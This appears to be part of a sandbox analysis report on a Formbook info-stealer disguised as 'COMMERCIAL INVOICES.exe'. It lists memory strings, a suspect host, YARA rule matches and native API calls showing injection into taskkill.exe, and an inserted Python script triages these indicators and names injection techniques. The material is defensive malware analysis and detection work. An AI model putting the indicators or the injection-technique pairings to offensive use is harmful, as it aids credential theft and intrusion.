            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/7115490.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/7115491.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/7115492.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/7517550.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/8042350.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/8767290.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/9237100.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/9638350.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/xiaoxiyou/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/xiaozaochuanlianzi/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/xidaoaili/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/xiqijiexika/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/yasendi/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/yingmulin/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/youtianzhenxi/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/youyuanbumei/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/zuozuomumingxib/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000005716000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://c.mipcdn.com/static/v1/mip.css
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: taskkill.exe, 00000006.00000002.3900061126.00000000058A8000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.00000000033E8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Nunito
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033n
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: taskkill.exe, 00000006.00000003.2720642580.0000000007EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: COMMERCIAL INVOICES.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            Source: Yara match | File source: 4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.COMMERCIAL INVOICES.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.COMMERCIAL INVOICES.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sample | Static PE information: Filename: COMMERCIAL INVOICES.exe
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0042C2D3 NtClose | 4_2_0042C2D3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282B60 NtClose,LdrInitializeThunk | 4_2_01282B60
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282DF0 NtQuerySystemInformation,LdrInitializeThunk | 4_2_01282DF0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282C70 NtFreeVirtualMemory,LdrInitializeThunk | 4_2_01282C70
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012835C0 NtCreateMutant,LdrInitializeThunk | 4_2_012835C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01284340 NtSetContextThread | 4_2_01284340
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01284650 NtSuspendThread | 4_2_01284650
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282BA0 NtEnumerateValueKey | 4_2_01282BA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282B80 NtQueryInformationFile | 4_2_01282B80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282BE0 NtQueryValueKey | 4_2_01282BE0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282BF0 NtAllocateVirtualMemory | 4_2_01282BF0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282AB0 NtWaitForSingleObject | 4_2_01282AB0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282AF0 NtWriteFile | 4_2_01282AF0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282AD0 NtReadFile | 4_2_01282AD0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282D30 NtUnmapViewOfSection | 4_2_01282D30
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282D00 NtSetInformationFile | 4_2_01282D00
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282D10 NtMapViewOfSection | 4_2_01282D10
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282DB0 NtEnumerateKey | 4_2_01282DB0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282DD0 NtDelayExecution | 4_2_01282DD0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282C00 NtQueryInformationProcess | 4_2_01282C00
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282C60 NtCreateKey | 4_2_01282C60
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282CA0 NtQueryInformationToken | 4_2_01282CA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282CF0 NtOpenProcess | 4_2_01282CF0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282CC0 NtQueryVirtualMemory | 4_2_01282CC0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282F30 NtCreateSection | 4_2_01282F30
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282F60 NtCreateProcessEx | 4_2_01282F60
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282FA0 NtQuerySection | 4_2_01282FA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282FB0 NtResumeThread | 4_2_01282FB0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282F90 NtProtectVirtualMemory | 4_2_01282F90
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282FE0 NtCreateFile | 4_2_01282FE0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282E30 NtWriteVirtualMemory | 4_2_01282E30
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282EA0 NtAdjustPrivilegesToken | 4_2_01282EA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282E80 NtReadVirtualMemory | 4_2_01282E80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282EE0 NtQueueApcThread | 4_2_01282EE0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01283010 NtOpenDirectoryObject | 4_2_01283010
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01283090 NtSetValueKey | 4_2_01283090
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012839B0 NtGetContextThread | 4_2_012839B0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01283D10 NtOpenProcessToken | 4_2_01283D10
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01283D70 NtOpenThread | 4_2_01283D70
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE4650 NtSuspendThread,LdrInitializeThunk | 6_2_04BE4650
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE4340 NtSetContextThread,LdrInitializeThunk | 6_2_04BE4340
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2CA0 NtQueryInformationToken,LdrInitializeThunk | 6_2_04BE2CA0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2C70 NtFreeVirtualMemory,LdrInitializeThunk | 6_2_04BE2C70
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2C60 NtCreateKey,LdrInitializeThunk | 6_2_04BE2C60
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2DF0 NtQuerySystemInformation,LdrInitializeThunk | 6_2_04BE2DF0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2DD0 NtDelayExecution,LdrInitializeThunk | 6_2_04BE2DD0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2D30 NtUnmapViewOfSection,LdrInitializeThunk | 6_2_04BE2D30
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2D10 NtMapViewOfSection,LdrInitializeThunk | 6_2_04BE2D10
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2EE0 NtQueueApcThread,LdrInitializeThunk | 6_2_04BE2EE0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2FB0 NtResumeThread,LdrInitializeThunk | 6_2_04BE2FB0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2FE0 NtCreateFile,LdrInitializeThunk | 6_2_04BE2FE0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2F30 NtCreateSection,LdrInitializeThunk | 6_2_04BE2F30
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2AF0 NtWriteFile,LdrInitializeThunk | 6_2_04BE2AF0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2AD0 NtReadFile,LdrInitializeThunk | 6_2_04BE2AD0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2B60 NtClose,LdrInitializeThunk | 6_2_04BE2B60
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE35C0 NtCreateMutant,LdrInitializeThunk | 6_2_04BE35C0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE39B0 NtGetContextThread,LdrInitializeThunk | 6_2_04BE39B0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2CF0 NtOpenProcess | 6_2_04BE2CF0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2CC0 NtQueryVirtualMemory | 6_2_04BE2CC0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2C00 NtQueryInformationProcess | 6_2_04BE2C00
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2DB0 NtEnumerateKey | 6_2_04BE2DB0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2D00 NtSetInformationFile | 6_2_04BE2D00
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2EA0 NtAdjustPrivilegesToken | 6_2_04BE2EA0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2E80 NtReadVirtualMemory | 6_2_04BE2E80
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2E30 NtWriteVirtualMemory | 6_2_04BE2E30
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2FA0 NtQuerySection | 6_2_04BE2FA0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2F90 NtProtectVirtualMemory | 6_2_04BE2F90
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2F60 NtCreateProcessEx | 6_2_04BE2F60
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2AB0 NtWaitForSingleObject | 6_2_04BE2AB0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2BA0 NtEnumerateValueKey | 6_2_04BE2BA0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2B80 NtQueryInformationFile | 6_2_04BE2B80
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2BF0 NtAllocateVirtualMemory | 6_2_04BE2BF0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2BE0 NtQueryValueKey | 6_2_04BE2BE0
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE3090 NtSetValueKey | 6_2_04BE3090
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE3010 NtOpenDirectoryObject | 6_2_04BE3010
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE3D10 NtOpenProcessToken | 6_2_04BE3D10
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE3D70 NtOpenThread | 6_2_04BE3D70
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_00878F10 NtCreateFile | 6_2_00878F10
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_00879080 NtReadFile | 6_2_00879080
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_00879170 NtDeleteFile | 6_2_00879170
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_00879210 NtClose | 6_2_00879210
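            The rows above are what an analyst actually works from: the URL strings pulled out of process memory earlier on the page, and the native API calls resolved per code function, where the same set (NtWriteVirtualMemory, NtQueueApcThread, NtSetContextThread, NtUnmapViewOfSection, NtResumeThread) appears both in the sample and in the taskkill.exe it injected into. The Python script below is an added example and is not part of the Joe Sandbox report or product: it parses rows in this layout, groups URL strings by host, sets aside hosts that in this script's assumption are only scraped browser search-engine or Microsoft-account data rather than anything the malware contacts, and names the native-API combinations seen in each process. The sample rows are constructed from a subset of the report, and the residue host list, the pattern names and the function names are all this example's own choices.

```python
"""Triage helper for flattened Joe Sandbox "Source: ..." indicator rows.

Added example; not part of the Joe Sandbox report or product. It parses rows
in the layout shown above (URL strings found in memory, and native-API calls
per code function), groups the URLs by host, separates hosts that routinely
appear as scraped browser/OS data, and names the native-API combinations that
together make up process injection. The residue-host list, the pattern
groupings and the sample rows are assumptions or constructions of this script,
not findings of the report.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample rows in the report's layout (a small subset of the listing).
SAMPLE_ROWS = r"""
Source: oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.5711337.xyz/sitemap.xml
Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.5711337.xyz/uploads/images/711549.jpg
Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: COMMERCIAL INVOICES.exe | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01284340 NtSetContextThread | 4_2_01284340
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282EE0 NtQueueApcThread | 4_2_01282EE0
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282E30 NtWriteVirtualMemory | 4_2_01282E30
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282D30 NtUnmapViewOfSection | 4_2_01282D30
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01282FB0 NtResumeThread | 4_2_01282FB0
Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BE2EE0 NtQueueApcThread,LdrInitializeThunk | 6_2_04BE2EE0
Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_00878F10 NtCreateFile | 6_2_00878F10
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_02BAD5BC | 0_2_02BAD5BC
"""

URL_ROW = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)"
)
# The trailing cell repeats the function address, so a back-reference anchors the row end.
FUNC_ROW = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*\|?\s*Code function:\s*"
    r"(?P<func>\d+_\d+_[0-9A-Fa-f]+)\s*(?P<apis>[A-Za-z0-9_,]*?),?\s*\|?\s*(?P=func)\s*$"
)

# Assumption: hosts that appear because browser search-engine settings or
# Microsoft account state were scraped, not because the malware contacts them.
RESIDUE_HOSTS = {
    "duckduckgo.com", "ac.ecosia.org", "cdn.ecosia.org", "www.ecosia.org",
    "ch.search.yahoo.com", "login.live.com",
}

# Heuristic groupings (this script's assumption): a pattern is reported only
# when every API in its set was observed in the same process.
INJECTION_PATTERNS = {
    "APC injection": {"NtQueueApcThread"},
    "remote write": {"NtWriteVirtualMemory"},
    "thread context hijack": {"NtSetContextThread", "NtResumeThread"},
    "process hollowing (unmap + write)": {"NtUnmapViewOfSection", "NtWriteVirtualMemory"},
    "section mapping": {"NtCreateSection", "NtMapViewOfSection"},
}


def parse_rows(text):
    """Return (host -> set of URLs, (process name, process index) -> set of Nt* APIs)."""
    urls = defaultdict(set)
    native = defaultdict(set)
    for raw in text.splitlines():
        line = raw.strip()
        m = URL_ROW.match(line)
        if m:
            host = urlsplit(m.group("url")).hostname or ""
            urls[host].add(m.group("url"))
            continue
        m = FUNC_ROW.match(line)
        if m:
            proc = m.group("src").replace("/", "\\").rsplit("\\", 1)[-1]
            index = m.group("func").split("_", 1)[0]  # leading number is the process index
            apis = {a for a in m.group("apis").split(",") if a.startswith("Nt")}
            if apis:
                native[(proc, index)].update(apis)
    return urls, native


def split_hosts(urls, residue=RESIDUE_HOSTS):
    """Hosts to hunt or block first, and hosts explained away as scraped residue."""
    suspect = sorted(h for h in urls if h and h not in residue)
    known = sorted(h for h in urls if h in residue)
    return suspect, known


def injection_techniques(apis):
    """Pattern names whose complete API set is contained in the observed set."""
    return sorted(name for name, needed in INJECTION_PATTERNS.items() if needed <= apis)


def triage(text):
    urls, native = parse_rows(text)
    suspect, known = split_hosts(urls)
    injection = {key: injection_techniques(apis) for key, apis in native.items()}
    return {"suspect_hosts": suspect, "residue_hosts": known, "injection": injection}


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    print("hosts to hunt or block:", result["suspect_hosts"])
    print("scraped browser/OS residue:", result["residue_hosts"])
    for (proc, index), techniques in sorted(result["injection"].items()):
        print(f"process {index} ({proc}):", ", ".join(techniques) or "no injection pattern")
```

            Feed it the full row listing of this report (the regexes accept both the separated and the run-together cell layout) and the output separates the one host worth a blocklist entry from the search-engine and login.live.com strings that only tell you what the stealer read, and shows the same injection primitives in process 4 (the unpacked sample) and process 6 (taskkill.exe), which is what the "Injects a PE file into a foreign processes" and "Queues an APC in another process" signatures summarise.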
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_02BAD5BC | 0_2_02BAD5BC
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_07135EB0 | 0_2_07135EB0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_07138260 | 0_2_07138260
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_07131F38 | 0_2_07131F38
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_07131F48 | 0_2_07131F48
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_071327B8 | 0_2_071327B8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_071327A7 | 0_2_071327A7
